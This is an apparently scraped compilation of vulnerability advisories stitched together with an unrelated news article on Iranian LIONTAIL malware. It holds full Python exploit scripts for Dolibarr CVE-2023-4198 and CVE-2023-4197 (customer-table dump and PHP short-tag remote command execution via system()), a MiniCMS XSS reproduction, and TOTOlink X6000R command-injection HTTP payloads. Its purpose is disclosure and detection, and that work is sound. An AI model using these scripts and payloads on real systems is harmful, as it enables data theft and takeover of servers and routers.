Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**Dolibarr Improper Input Validation vulnerability**

High severity GitHub Reviewed Published Nov 1, 2023 to the GitHub Advisory Database • Updated Nov 1, 2023

GHSA-r9cm-pw9j-3fpx: Dolibarr Improper Input Validation vulnerability

Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data

**Summary:**

**Product**

Dolibarr ERP CRM

**Vendor**

Dolibarr

**Severity**

High

**Affected Versions**

<= 17.0.3

**Tested Versions**

17.0.1, 17.0.3

**CVE Identifier**

CVE-2023-4198

**CVE Description**

Improper Access Control in Dolibarr ERP CRM v17.0.3 allows unauthorized users to read a database table containing sensitive third-party customers’ information via the ajaxcompanies.php endpoint.

**CWE Classification(s)**

CWE-862 Missing Authorization

**CAPEC Classification(s)**

CAPEC-1 Accessing Functionality Not Properly Constrained by ACLs

**CVSS3.1 Scoring System:**

**Base Score:** 6.5 (Medium)  
**Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

None

**Availability (A)**

None

**Product Overview:**

Dolibarr ERP CRM is a web-based software that provides management for the target organization’s activities, such as contacts, suppliers, invoices, orders, stocks, agenda, etc. It is an open-source software suite designed for small, medium or large companies, foundations and freelancers. Administrators can use the fine grained permissions manager to grant permissions to various users based on their operational requirements.

Dolibarr ERP CRM operates as an all-in-one suite, which allows customizability based on the usage needs of the organization. It is highly modular as the administrators simply have to enable modules that they need and disable the ones they do not require. Almost every component is a module, which also means that Dolibarr ERP CRM is highly extensible in terms of features.

**Vulnerability Summary:**

Authorization checks were found to be missing as any authenticated user is able to list the details of all third-party customers stored in the database table societe, despite not having the required permissions to do so. This table contains sensitive data such as the third-party customers’ address, ZIP and town name.

**Vulnerability Details:**

The vulnerability is found at the /core/ajax/ajaxcompanies.php endpoint. It can be observed that no authorisation checks are performed, even though the application has the option to configure access control for each AJAX endpoint. The affected code can be found below:

    // /core/ajax/ajaxcompanies.php
    
    $socid = $_GET['newcompany'] ? $_GET['newcompany'] : '';
    // ...
    $sql .= "s.nom LIKE '%".$db->escape($socid)."%'";
    $sql .= " OR s.code_client LIKE '%".$db->escape($socid)."%'";
    $sql .= " OR s.code_fournisseur LIKE '%".$db->escape($socid)."%'";
    

Additionally, since the SQL query is formed by concatenating user-input in the LIKE clause, listing every row can be done by injecting % as the input. In order to exploit the vulnerability, the adversary must first be authenticated with any account. Then, access the vulnerable page by sending a GET request to:

http://TARGET_SERVER/core/ajax/ajaxcompanies.php?newcompany=%

**Exploit Conditions:**

This vulnerability can be exploited by having access to a low-privilege user account.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. The following is a functional exploit written in Python3 that exploits this vulnerability to achieve remote command execution:

    # Dolibarr ERP CRM (<= v17.0.3) Improper Access Control Vulnerability (CVE-2023-4198)
    # Via: https://TARGET_HOST/core/ajax/ajaxcompanies.php
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import json
    import re
    import requests
    import sys
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password, cmd
    
        print("\n===== Dolibarr ERP CRM (<= v17.0.3) Improper Access Control Vulnerability (CVE-2023-4198) =====\n")
    
        if len(sys.argv) != 4:
            print("[!] Please enter the required arguments like so: python3 {} https://TARGET_URL USERNAME PASSWORD".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
    
    def authenticate():
        global s, csrf_token
    
        print("[+] Attempting to authenticate...")
    
        # GET the CSRF token
        res = s.get(f"{target}/", verify=False)
        csrf_token = re.search("\"anti-csrf-newtoken\" content=\"(.+)\"", res.text).group(1).strip()
    
        # Login
        data = {
            "token": csrf_token,
            "username": username,
            "password": password,
            "actionlogin": "login"
        }
        res = s.post(f"{target}/", data=data, verify=False)
    
        if "Logout" not in res.text:
            print("[!] Authentication failed! Are the credentials valid?")
            sys.exit(1)
        else:
            print("[+] Authenticated successfully!")
    
    def dump_table():
        # Dump the third-party customers table
        print("[+] Dumping third-party customers table (societe)...")
        res = s.get(f"{target}/core/ajax/ajaxcompanies.php?newcompany=%", verify=False, proxies={'http':'127.0.0.1:8080'})
        if res.status_code != 200:
            print("[!] Endpoint unreachable! Is the URL correct?")
            sys.exit(1)
        else:
            output = json.loads(res.text)
            print(f"[+] Output of societe table:\n\n{output}")
    
    def main():
        check_args()
        authenticate()
        dump_table()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

Update the Dolibarr installation to the latest version as shown from the official repository releases page.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the server’s access logs to see if there were any requests made to /core/ajax/ajaxcompanies.php, and inspecting the value of the newcompany parameter of these requests.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2023-09-04 Reported vulnerability to Dolibarr owner
*   2023-09-05 Dolibarr owner mentioned that the endpoint has been removed since v18.0.0
*   2023-11-01 Public Release

CVE-2023-4198: (CVE-2023-4198) Dolibarr ERP CRM (

By Deeba Ahmed
Researchers believe that the primary goal behind this campaign is espionage. 
This is a post from HackRead.com Read the original post: Iran’s Scarred Manticore Targets Middle East with LIONTAIL Malware

Scarred Manticore is targeting high-profile organizations focusing keenly on telecommunication, military, and government entities apart from financial institutions, IT service providers, and NGOs.

Check Point Research (CPR) and Sygnia’s Incident Response Team have uncovered a new Iranian espionage campaign they have tied to the notorious Scarred Manticore threat group.

In its technical report titled “From Albanian to the Middle East: The Scarred Manticore is Listening,” it is revealed that the group is using a previously undocumented malware framework called LIONTAIL. This malware uses custom loaders and memory-resident shellcode payloads to blend its malicious functionalities into legitimate network traffic.

Researchers believe that the primary goal behind this campaign is espionage. This threat actor is among the Iranian actors involved in destructive cyberattacks against the Albanian government infrastructure at the behest of MOIS (Ministry of Intelligence & Security) back in July 2022. CPR claims that this threat group has been active since at least 2019, prefers gaining covert access, and persistently pursues data extraction.

Further probing revealed that Scarred Manticore is targeting high-profile organizations in the Middle East in this ongoing espionage campaign, focusing keenly on telecommunication, military, and government entities apart from financial institutions, IT service providers, and NGOs.

Though the LIONTAIL framework appears unique with no code overlaps with any known malware family detected thus far, the other tools used in the attacks overlap with previously reported attacks. Some of these attacks are linked to the OilRig or OilRig-affiliated clusters but there’s insufficient evidence to link the Scarred Manticore group with OilRig. 

Since 2019, this group has been using a custom toolset to compromise internet-exposed Windows servers in the Middle East. In this particular campaign, CPR has uncovered, that the victims are located in Saudi Arabia, the UAE, Kuwait, Jordan, Iraq, Oman, and Israel.

The geographic regions targeted in this campaign and Scarred Manticore’s previous activities sharply align with Iranian interests and with the typical victim profile targeted by MOIS-sponsored groups in espionage operations.

Scarred Manticore’s toolset has evolved considerably over time as from open-source web-based proxies, they gradually switched to powerful tools combining open-source and custom components. The Tunna-based web shell is one of the group’s earliest tools, an open-source tool used to tunnel TCP communications over HTTP to let attackers connect to any service on the remote host, even those blocked by firewalls. 

This actor now uses a range of IIS-based backdoors to target Windows servers, including custom web shells, custom DLL backdoors, and driver-based implants. The custom malware framework LIONTAIL, which CPR dubbed ‘digital chameleon,’ can establish persistence on compromised systems and steal sensitive data without being detected. It uses custom loaders and special codes to remain in the computer’s memory and hijacks the HTTP.sys driver to become a part of the regular network activity.

The evolution in Scarred Manticore’s tools and capabilities demonstrates the progress Iranian threat actors have undergone within the past few years because the techniques used in recent campaigns are far more sophisticated than previous ones tied to Iran.

****_RELATED ARTICLES_****

1.  Iran-linked hackers hit Israeli, US and EU defence tech firm
2.  GhostSec Claim Breaching Iranian Govt Surveillance Software Tool
3.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
4.  Iranian Stalkerware ‘Spyhide’ Steals Data from 60,000 Android Devices
5.  Ransom fail: Iranian hackers leak trove of Israeli LGBTQ dating app data
6.  Log4Shell – Iranian Hackers Accessed Domain Controller of US Federal Network

Iran’s Scarred Manticore Targets Middle East with LIONTAIL Malware

**Summary:**

**Product**

Dolibarr ERP CRM

**Vendor**

Dolibarr

**Severity**

High

**Affected Versions**

<= 18.0.1

**Tested Versions**

17.0.1, 18.0.1

**CVE Identifier**

CVE-2023-4197

**CVE Description**

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**CWE Classification(s)**

CWE-20: Improper Input Validation

**CAPEC Classification(s)**

CAPEC-248 Command Injection CAPEC-153: Input Data Manipulation

**CVSS3.1 Scoring System:**

**Base Score:** 7.5 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

High

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Dolibarr ERP CRM is a web-based software that provides management for the target organization’s activities, such as contacts, suppliers, invoices, orders, stocks, agenda, etc. It is an open-source software suite designed for small, medium or large companies, foundations and freelancers. Administrators can use the fine grained permissions manager to grant permissions to various users based on their operational requirements.

Dolibarr ERP CRM operates as an all-in-one suite, which allows customizability based on the usage needs of the organization. It is highly modular as the administrators simply have to enable modules that they need and disable the ones they do not require. Almost every component is a module, which also means that Dolibarr ERP CRM is highly extensible in terms of features.

**Vulnerability Summary:**

Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for <?php and <?=, allowing usage of the <? short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP.

**Vulnerability Details:**

There are two ways to exploit this vulnerability, one is to “import” content from a specified URL; the other is to edit an existing page.

The vulnerable code can be found in the function dolKeepOnlyPhpCode(), inside the /core/lib/website.lib.php file. where no checking for the <? tag is done. This function intended purpose is to extract the PHP code from the given string and return it to the caller. The caller would throw an error if this function returns a non-empty string since it indicates the presence of PHP code.

    /core/lib/website.lib.php:
    <?php
    
    function dolKeepOnlyPhpCode($str)
    {
        $str = str_replace('<?=', '<?php', $str);
    
        $newstr = '';
    
        // Split on each opening tag
        //$parts = explode('<?php', $str);
        $parts = preg_split('/'.preg_quote('<?php', '/').'/i', $str);
    
        if (!empty($parts)) {
            $i = 0;
            foreach ($parts as $part) {
                if ($i == 0) {  // The first part is never php code
                    $i++;
                    continue;
                }
                $newstr .= '<?php';
                //split on closing tag
                $partlings = explode('?>', $part, 2);
                if (!empty($partlings)) {
                    $newstr .= $partlings[0].'?>';
                } else {
                    $newstr .= $part.'?>';
                }
            }
        }
        return $newstr;
    }
    

This function takes in a single argument which is the string to sanitize. It first replaces all occurrences of <?= with <?php and subsequently all <?php tags are tokenized, and the string between the opening and optional closing tags are selected and returned to the caller.

In order to achieve RCE, the adversary must first be authenticated with an account and the Website module must be enabled. Then, modify an existing web page to include the <? tag where arbitrary PHP code can be executed. Command execution is achieved by using any of the PHP functions that executes system code (i.e. system()). After the web page is modified successfully, previewing the updated page would trigger the RCE:

**Exploit Conditions:**

This vulnerability can be exploited when the “Website” module is enabled, as well as having access to a low-privilege user account.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. The following is a functional exploit written in Python3 that exploits this vulnerability to achieve remote command execution:

    # Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197)
    # Via: https://TARGET_HOST/website/index.php
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import os
    import re
    import requests
    import sys
    import uuid
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password, cmd
    
        print("\n===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====\n")
    
        if len(sys.argv) != 5:
            print("[!] Please enter the required arguments like so: python3 {} https://TARGET_URL USERNAME PASSWORD CMD_TO_EXECUTE".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
        cmd = sys.argv[4]
    
    def authenticate():
        global s, csrf_token
    
        print("[+] Attempting to authenticate...")
    
        # GET the CSRF token
        res = s.get(f"{target}/", verify=False)
        csrf_token = re.search("\"anti-csrf-newtoken\" content=\"(.+)\"", res.text).group(1).strip()
    
        # Login
        data = {
            "token": csrf_token,
            "username": username,
            "password": password,
            "actionlogin": "login"
        }
        res = s.post(f"{target}/", data=data, verify=False)
    
        if "Logout" not in res.text:
            print("[!] Authentication failed! Are the credentials valid?")
            sys.exit(1)
        else:
            print("[+] Authenticated successfully!")
    
    def rce():
        # Create web site
        print("[+] Attempting to create a website...")
        website_name = uuid.uuid4().hex
        data = {
            "WEBSITE_REF": website_name,
            "token": csrf_token,
            "action": "addsite",
            "WEBSITE_LANG": "en",
            "addcontainer": "create"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Website - {website_name}" not in res.text:
            print("[!] Website creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created website name: \"{website_name}\"!")
    
        # Create web page
        print("[+] Attempting to create a web page...")
        webpage_name = uuid.uuid4().hex
        data = {
            "website": website_name,
            "token": csrf_token,
            "action": "addcontainer",
            "WEBSITE_TYPE_CONTAINER": "page",
            "WEBSITE_TITLE": "x",
            "WEBSITE_PAGENAME": webpage_name
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Contenair \\'{webpage_name}\\' added" not in res.text:
            print("[!] Web page creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created web page name: \"{webpage_name}\"!")
    
        # Modify created page
        print("[+] Attempting to modify the web page...")
        webpage_id = re.search(f"<option value=\"(.+)\" .+{webpage_name}", res.text).group(1).strip()
        data = {
            "website": website_name,
            "WEBSITE_PAGENAME": webpage_name,
            "pageid": webpage_id,
            "token": csrf_token,
            "action": "updatemeta",
            "htmlheader": f"<? echo system('{cmd}'); ?>"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if "Saved" not in res.text:
            print("[!] Web page modification failed!")
            sys.exit(1)
        else:
            print("[+] Web page modified successfully!")      
    
        # Trigger RCE
        print(f"[+] Triggering RCE now via: {target}/public/website/index.php?website={website_name}&pageref={webpage_name}")
        res = s.get(f"{target}/public/website/index.php?website={website_name}&pageref={webpage_name}", verify=False)
        if res.status_code != 200:
            print("[!] Web page is not reachable!")
            sys.exit(1)
        else:
            output = re.findall("block -->\n(.+)</head>", res.text, re.MULTILINE | re.DOTALL)[0].strip()
            print(f"[+] RCE successful! Output of command:\n\n{output}")
    
    def main():
        check_args()
        authenticate()
        rce()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

Update the Dolibarr installation to the latest version as shown from the official repository releases page.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the /document/ directory (default upload directory) to see if there are any .tpl files containing <? tags, and further inspecting the code contained within.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2023-09-04 Reported vulnerability to Dolibarr owner
*   2023-09-05 Dolibarr owner acknowledged vulnerability and pushed a patch commit. Also mentioned that it will be in the next release
*   2023-10-11 New version containing patch released
*   2023-11-01 Public Release

CVE-2023-4197: (CVE-2023-4197) Dolibarr ERP CRM (


Poorly constructed webap requests and URI components with special characters trigger unhandled errors and exceptions, disclosing
information about the underlying technology and other sensitive information details. The website unintentionally reveals sensitive information including technical details like version Info, endpoints,
backend server, Internal IP. etc., which can potentially expose additional attack surface containing other interesting vulnerabilities. 



CVE-2023-5516

Stored Cross Site Scripting (XSS) vulnerability in MiniCMS 1.1.1 allows attackers to run arbitrary code via crafted string appended to /mc-admin/conf.php.

1.Environment download address: https://codeload.github.com/bg5sbk/MiniCMS/zip/refs/tags/v1.11

2.Log in to the background page to go to the following URL

 /mc-admin/conf.php 

3.At the site address, enter: javascript:alert(1)

4.xss is triggered by clicking on my website at /mc-admin/head.php

CVE-2023-46378: Minicms1.1.1 Exists storage xss

Cross Site Request Forgery vulnerability in Click Studios (SA) Pty Ltd Passwordstate v.Build 9785 and before allows a local attacker to execute arbitrary code via a crafted request.

Incident Management Advisories

**Major Incidents**

**Click Studios has an established Incident Management Plan that is used in the event of major incidents affecting Passwordstate’s operation.**

As part of the Incident Management Process, Click Studios will email all customers advising to check this advisories page for updates. Advisories detail the best known information available, at a point in time, and are the only authorized updates for existing and potential customers, media and interested parties. By publishing these advisories, representing the single source of truth, Technical Support Team members, developers and Pre-Sales staff can focus solely on assisting customers with the major incident.

Please be aware that emails to Sales or Support, requesting additional information, will be replied to with a standard response directing the requestor to this Advisories page. Please understand, if Click Studios invokes the Incident Management Plan, our number one priority is working with our customers to identify if they have been affected and advising them of required remedial actions.

We recommend any interested party periodically check this advisories page for the latest updates.

**Advisories:**

There are no current major incidents at this time.

**Common Vulnerabilities and Exposures:**

The table below provides a list of Click Studios confirmed information-security vulnerabilities and exposures for Passwordstate or associated modules. Interested parties can subscribe to this list to be notified when new CVEs are added.

**_Date_**

*   2023-09-25
*   2023-08-31
*   2022-11-07
*   2022-09-05
*   2022-09-05
*   2020-10-29
*   2020-10-05
*   2018-08-01

**_CVE(s)_**

*   CVE Pending
*   CVE-2023-43295
*   CVE-2022-3877
*   CVE-2022-3875
*   CVE-2022-3876
*   CVE-2020-27747
*   CVE-2020-26061
*   CVE-2018-14776

**_Severity_**

*   Low
*   Low
*   Medium
*   High
*   Medium
*   Low
*   High
*   Low

**_Product_**

*   Passwordstate API
*   Passwordstate Core
*   Passwordstate Core
*   Passwordstate API
*   Passwordstate API
*   Mobile Web Site (Deprecated)
*   Password Reset Portal
*   Passwordstate Core

**_Description_**

*   Incorrect Access Control allowing the potential for an existing Security Administrator to use the System Wide API Key to interact with private password lists for Password History, delete and copy/move API endpoints.
*   Fixed a potential Cross-Site Request Forgery (CSRF) failure, for authenticated sessions, which allowed remote attackers who are able to trick a user into retrying a request to bypass CSRF protection and replay a carefully crafted request.
*   Cross site scripting vulnerability for URL field
*   Authentication bypass by assumed-immutable data
*   Manipulation of the argument PasswordID leads to authorization bypass
*   Lack of brute force attack detection on PIN code authentication
*   A well crafted HTTP request allowed setting a password for a registered user
*   XSS by authenticated users via an uploaded HTML document

**_Fixed_**

*   Build 9811
*   Build 9795
*   Build 9653
*   Build 9611
*   Build 9611
*   Build 8987
*   Build 8501
*   Build 8397

**Subscribe to our Annoucements/Advisories RSS Feed

Subscribe to our RSS Feed for the latest announcements and security advisories.

Simply add the URL of https://forums.clickstudios.com.au/forum/6-announcements.xml to your favorite RSS Reader.

  

**

CVE-2023-43295: Security - Click Studios

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.

**TOTOlink X6000R command injection****Product Information**

Device: TOTOlink X6000R  
Firmware version: V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

There is arbitrary command execution on the setLedCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 55Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/basic/qos.html?time=1694023460381Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"enable":"`ls>/web/test5.txt`","topicurl":"setLedCfg"}

Inject commands： “ls>/web/test5.txt”

Test results.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test5.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analysis**

The following functions in shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_411F90(__int64 a1, __int64 a2){  const char *v3; // x20  unsigned int v4; // w19  v3 = (const char *)sub_40BD6C(a1, "enable");  v4 = atoi(v3);  if ( *v3 && v4 <= 1 )  {    Uci_Set_Str(11LL, "main", "led_status", v3);    Uci_Commit(11LL);    set_led_status(v4);  }  datconf_set_by_key("/var/cste/temp_status", "mesh_update", "1");  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is an enable variable command splicing to bypass the execution, without any filtering!

The root cause comes from the following

Since the Uci\_Set\_Str function command arguments of the libcscommon.so library in shttpd are susceptible to operating system command injection. When the program calls get\_uci2json, it will call Uci\_Set\_Str in the so library, causing arbitrary command execution, and the permissionless operation of the interface setLanguageCfg leads to unauthorized arbitrary command execution.

In this part of shttpd, the relevant language settings are called

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  

    __int64 __fastcall sub_4117F8(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x23  int v6; // w0  int v8; // [xsp+44h] [xbp+44h] BYREF  char s[8]; // [xsp+48h] [xbp+48h] BYREF  __int64 v10; // [xsp+50h] [xbp+50h]  __int64 v11; // [xsp+58h] [xbp+58h]  __int64 v12; // [xsp+60h] [xbp+60h]  __int64 v13; // [xsp+68h] [xbp+68h]  __int64 v14; // [xsp+70h] [xbp+70h]  __int64 v15; // [xsp+78h] [xbp+78h]  __int64 v16; // [xsp+80h] [xbp+80h]  __int64 v17[8]; // [xsp+88h] [xbp+88h] BYREF  v4 = (const char *)sub_40BD6C(a1, "lang");  v5 = (const char *)sub_40BD6C(a1, "langAutoFlag");  v8 = 0;  *(_QWORD *)s = 0LL;  v10 = 0LL;  v11 = 0LL;  v12 = 0LL;  v13 = 0LL;  v14 = 0LL;  v15 = 0LL;  v16 = 0LL;  memset(v17, 0, sizeof(v17));  Uci_Set_Str();  Uci_Get_Int(11LL, "main", "lang_auto_flag", &v8);  v6 = atoi(v5);  if ( v6 != v8 )    Uci_Set_Str();  Uci_Commit(11LL);  snprintf(s, 0x40uLL, "helpurl_%s", v4);  Uci_Get_Str(15LL, "custom", s, v17);  if ( LOBYTE(v17[0]) )  {    *(_QWORD *)s = 0LL;    v10 = 0LL;    v11 = 0LL;    v12 = 0LL;    v13 = 0LL;    v14 = 0LL;    v15 = 0LL;    v16 = 0LL;    snprintf(s, 0x40uLL, "http://%s", (const char *)v17);  }  else  {    strcpy(s, "");  }  sub_40BDA0(a2, 1LL, "", 0LL, "0", s);  return 0LL;}

现在来看libcscommon.so

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

    ABEL_57:  while ( 1 )  {    off_2AB30(v12, 1024LL, "uci -c %s set %s.%s.%s=\"%s\"", v9, v10, a2, a3, a4);    off_2AD78(v12, 0LL);    result = 1LL;LABEL_58:    if ( v13 == *(_QWORD *)off_2A970 )      break;    off_2AC18();LABEL_60:    v9 = "/tmp/cste/";    v10 = "system_status";  }  return result;

The off\_2AD78 of them is LOAD:000000000002AD78 18 60 00 00 00 00 00 00 off\_2AD78 DCQ CsteSystem

That is, system

CVE-2023-46484: TOTOlink X6000R command injetction (setLedCfg)

An issue in TP-Link Tapo C100 v1.1.15 Build 211130 Rel.15378n(4555) and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted web request.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#web